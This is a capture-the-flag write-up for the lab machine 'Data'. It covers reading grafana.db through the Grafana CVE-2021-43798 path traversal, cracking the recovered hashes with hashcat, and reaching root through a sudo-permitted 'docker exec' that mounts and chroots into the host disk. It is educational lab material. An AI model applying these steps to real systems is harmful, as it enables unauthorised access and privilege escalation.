Skip to main content

Machine (Easy) - Data

Writeup for the Data machine, an easy Linux box focused on exploiting a Grafana vulnerability to gain root access.

Writeup Author: BobBuilder

Objective: Exploit a path traversal vulnerability in Grafana v8.0.0 to extract credentials, crack password hashes, gain user access, and escalate privileges to root using Docker.

Category Difficulty Platform Machine Author
Machine Easy Linux xct

Enumeration

PORT     STATE SERVICE 
22/tcp   open  ssh 
3000/tcp open  ppp

User

Discovering Grafana and Its Version

While exploring the web interface hosted on port 3000, we identify the service as Grafana v8.0.0:

http://<data_ip>:3000/user/password/send-reset-email

Grafana version is confirmed:

grafana - v8.0.0 (41f0542c1e)

This version is vulnerable to a well-known path traversal vulnerability: CVE-2021-43798.

Exploiting CVE-2021-43798 to Read grafana.db

We use the following ADMinion Bryan McNulty's public exploit script to perform path traversal and read arbitrary files, which we target the internal database:

/var/lib/grafana/grafana.db

After retrieving the file, we extract user credentials, including hashed passwords:

admin@localhost||<long_hash>  
boris@data.vl|boris|<long_hash>

Cracking the Hashes

The hashes are in the PBKDF2-SHA256 format:

sha256:10000:<salt>:<hash>

We prepare them for hashcat and run:

.\hashcat.exe -a0 -m 10900 hashes.txt rockyou.txt

The hash for user boris is successfully cracked:

boris:<REDACTED>

We now have valid credentials to access the machine as boris.

Root

Enumerating Sudo Permissions

After logging in as boris, we check for elevated privileges:

sudo -l

We find a powerful permission:

(root) NOPASSWD: /snap/bin/docker exec *

This means the user can execute commands inside any Docker container as root — a typical Docker breakout vector.

Escaping to the Host via Docker

We first access the running Grafana container:

sudo /snap/bin/docker exec -it grafana /bin/sh

To interact with the host system, we mount the host disk inside the container:

sudo /snap/bin/docker exec --privileged -u 0 -it grafana mkdir /mnt/host
sudo /snap/bin/docker exec --privileged -u 0 -it grafana mount /dev/xvda1 /mnt/host

We chroot into the host filesystem to fully escape the container:

sudo /snap/bin/docker exec --privileged -u 0 -it grafana chroot /mnt/host /bin/sh

From here, we have full root access and can retrieve the root flag:

cat /root/root.txt
Back to top